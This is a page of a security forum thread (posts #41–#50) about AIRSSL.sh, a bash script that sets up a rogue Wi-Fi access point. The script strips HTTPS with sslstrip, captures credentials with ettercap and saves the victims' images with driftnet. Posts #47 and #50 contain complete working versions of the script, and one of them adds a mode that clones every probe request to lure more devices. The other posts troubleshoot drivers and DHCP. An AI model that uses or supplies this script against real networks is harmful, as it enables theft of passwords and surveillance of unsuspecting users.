Page 5 of 9 FirstFirst ... 34567 ... LastLast
Results 41 to 50 of 88

Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

  1. #41
    Senior Member
    Join Date
    Jul 2009
    Posts
    135

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    To all that may still encountering permission issues with the DHCP portion of the script, the following fix shouid take care of this (it did for me).

    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid


    Enter these two commands in the script just before the code that starts dhcpd server.

    Read More here at my blog.

  2. #42
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    5

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Just wanted to say thanks for the script and help on irc killa. Your hint lead me to a bunch of possible solutions. One of which is taken straight from the ettercap man page. DOH!

    "BRIDGED, it uses two network interfaces and forward the traffic from one to the other while performing sniffing and content filtering. This sniffing method is totally stealthy since there is no way to find that someone is in the middle on the cable. You can look at this method as a mitm attack at layer 1. You will be in the middle of the cable between two entities. Don’t use it on gateways or it will transform your gateway into a bridge. HINT: you can use the content filtering engine to drop packets that should not pass. This way ettercap will work as an inline IPS "

    Haven't tried it yet, but it's a start in the right direction after being at a stalemate for days. Again, many thanks.

  3. #43
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    4

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I have a question in regards to POST #31. I've read several posts where there were reported issues with r8187 driver, but I was wondering if anyone else encountered a similar situation.

    Whenever I run airbase-ng using the r8187 driver (AWUS036H) it doesn't send out any beacons. Does anyone have an alternate solution? Previously, I have used RTL8187 driver with the AWUS036H but dhcpd is incredibly slow.


    - UPDATE
    To elaborate more about my situation, i have a 500mw AWUS036H(older) and a 1000mw AWUS036H(newer) alpha cards, both of which are using the r8187 driver. Initially, "iwconfig" will recognize each card at 5 dbm. At this setting, I am able to see the beacons sent by airbase-ng. But after following POST #31, more specifically the part about adjusting the transmit power, I am unable to see the beacons being broadcasted by airbase-ng. I used the command "iwpriv wlan1 highpower 1" and "iwconfig wlan1 txpower 27". Only when I adjust the txpower to it's fullest capacity (whether it is 27dbm/500mw or 30dbm/1000mw) does airbase-ng stop sending beacons.

    Has anyone encountered this issue or have a recommendation?
    Last edited by xsv10; 09-08-2010 at 05:35 PM.

  4. #44
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    7

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    thanks for a great script and great thread.

    I got this setup working on my VM of BT4 R1 with using both a WUSB54g v4 and AWUS050NH.

    The only issue i've had so far is that the awus050nh isn't very stable and will dissapear as a AP after a short while - but this is probably my cards fault as it is in pretty bad shape.

    I do, however, have one question - the first couple of times i tried to log on to gmail with a PC connected to the fake AP i only got to a page something like "please enable cookies in your browser" - has anyone else experienced something similar?

    it is by no means a big issue though as this issue "resolved itself" after waiting a couple of minutes and trying again..

  5. #45
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    2

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I cannot connect to internet using r8187

    I also get "Can't create PID file ...: Permission denied" using both drivers.

  6. #46
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    11

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    all works all right but when i try to connect to the internet through firefox it does not browse anything. I think it's a dns problem. Is it possible?

  7. #47
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    11

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    i have got it to work with some little modification(merging this with a tutorial i have found), also removing the 2 commented lines in etter.conf. Probably the "not browsing issue" was a missing route add line. Here is the code if someone needs it. I have tested it with r8187(very bad performances) and rt73usb(a WUSB54GC with very good results instead):
    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja
    # airssl.sh - v1.0
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 192.168.5.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.5.255;
    option routers 192.168.5.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.5.130 192.168.5.140;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Network question
    echo
    echo "AIRSSL 1.0 - killadaninja  "
    echo
    echo -n "Enter the networks gateway or DNS IP address, for example 192.168.1.254: "
    read -e gatewayip
    echo -n "Enter your interface thats connected to the internet, for example wlan0: "
    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan1: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    echo
    echo "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches, choose n if your are unsure... y or n "
    read ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    fi
    
    if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface &
    sleep 2
    fi
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface &
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring forwarding tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 192.168.5.129 netmask 255.255.255.128
    ifconfig at0 mtu 1400
    route add -net 192.168.5.128 netmask 255.255.255.128 gw 192.168.5.129
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    #iptables -t nat -A POSTROUTING -o at0 -j MASQUERADE
    
    # DHCP
    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
    echo > '/var/lib/dhcp3/dhcpd.leases'
    echo "[+] Setting up DHCP..."
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" -pf /var/run/dhcpd/dhcpd.pid at0 &
    sleep 3
    
    # Sslstrip
    echo 1 > /proc/sys/net/ipv4/ip_forward
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -a -k &
    sleep 2
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    echo "Ettercap will run in its most basic mode(remember to remove # from etter.conf), would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose n, y or n "
    read ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 &
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 &
    sleep 1
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    echo "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), y or n "
    read DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata &
    sleep 3
    fi
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs, their credentials 
    will be displayed in ettercap. You may use right/left mouse buttons 
    to scroll up/down ettercaps xterm shell, ettercap will also save its output 
    to /pentest/wireless/airssl/passwords unless you stated otherwise. 
    Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close airssl and clean up properly by hitting y,
    if airssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    killall xterm
    killall driftnet
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    exit
    
    fi
    exit

  8. #48
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hope someone can help,

    The script runs fine (eth0 for my internet connection & wlan0 (rt73usb) for the fake ap creation)

    I can see the fake AP but on the client it doesn't seem to get an IP from the dhcp?

    Also tried to use mon0 to create the fake ap & same result

    I am using BT4R1 on VMware with RT73USB (edimax )

    SCREENSHOT

  9. #49
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quote Originally Posted by nlflux View Post
    Hope someone can help,

    The script runs fine (eth0 for my internet connection & wlan0 (rt73usb) for the fake ap creation)

    I can see the fake AP but on the client it doesn't seem to get an IP from the dhcp?

    Also tried to use mon0 to create the fake ap & same result

    I am using BT4R1 on VMware with RT73USB (edimax )

    SCREENSHOT
    Would it be possible to try connecting BT directly to your network Non-natted, or check the other options inside Vm for networking?
    Last edited by killadaninja; 02-10-2011 at 07:00 PM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  10. #50
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I hope you don't mind but I made a few additions to your script for a demonstration i needed to run at work.

    I have added/changed the following:
    • Shows routing table with gateway IP & Interface at startup
    • Made the DHCP hostname match the chosen SSID (doesnt work in ALL mode)
    • Added an ALL (a) mode to the FakeAP settings prompt (Instead of using the fixed SSID it clones ALL incoming probe requests)
    • Fixed the DHCP PID permissions issue as discussed in this thread
    • Added Interface and Monitor Names to the Fake AP Xterm window title
    • Changed SSLstip to only log SSL Post instead of all SSL data as all the data is logged by ettercap anyway
    • Added an SSLstip Log window showing just SSL Post data (much cleaner than watching ettercap output for USER:PASS details.
    • Improved the Cleanup Routine - replaced 'killall' with 'kill ${PROCESSid}'s'


    Here is my updated code in case your interested:

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010
    # airssl.sh - v1.0
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    
    # Network questions
    echo
    echo "Fake AP - SSL Strip"
    echo
    route -n -A inet | grep UG
    echo
    echo
    echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.1.254: "
    read -e gatewayip
    echo -n "Enter your interface thats connected to the internet, this should be listed above. For example wlan0: "
    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan1: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called: "
    read -e ESSID
    airmon-ng start $fakeap_interface
    fakeap=$fakeap_interface
    fakeap_interface="mon0"
    
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "\"$ESSID\"";
    option domain-name-servers 10.0.0.1;
    
    range 10.0.0.20 10.0.0.50;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    echo
    echo "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches, would you like Airbase to clone ALL probe requests
    choose n if your are unsure... Y or N or All? "
    read ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    fi
    
    if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring forwarding tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    # DHCP
    echo "[+] Setting up DHCP..."
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Sslstrip
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
    sleep 2
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    echo "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose n, y or n "
    read ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    echo "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), y or n "
    read DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials 
    will be displayed in ettercap. You may use right/left mouse buttons 
    to scroll up/down ettercaps xterm shell, ettercap will also save its output 
    to /pentest/wireless/airssl/passwords unless you stated otherwise. 
    Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close airssl and clean up properly by hitting y,
    if airssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    exit
    
    fi
    exit
    Thank you again for making it available in the 1st place and i hope you find my changes usefull.

    Regards
    J
    Last edited by g60jon; 11-14-2010 at 11:15 AM. Reason: Updated code to inculde improved cleanup

Page 5 of 9 FirstFirst ... 34567 ... LastLast

Similar Threads

  1. Replies: 44
    Last Post: 04-08-2011, 02:30 AM
  2. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  3. sslstrip with ettercap or airspoof not capturing password
    By danielgc in forum OLD BackTrack 4 General Support
    Replies: 3
    Last Post: 08-29-2009, 10:29 PM
  4. Capturing passwords on a big LAN!
    By dxi5t in forum OLD Pentesting
    Replies: 5
    Last Post: 06-10-2008, 05:05 PM
  5. Wifiopn-cap: automated OPN Network capturing script
    By teknecal in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 04-21-2008, 01:39 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •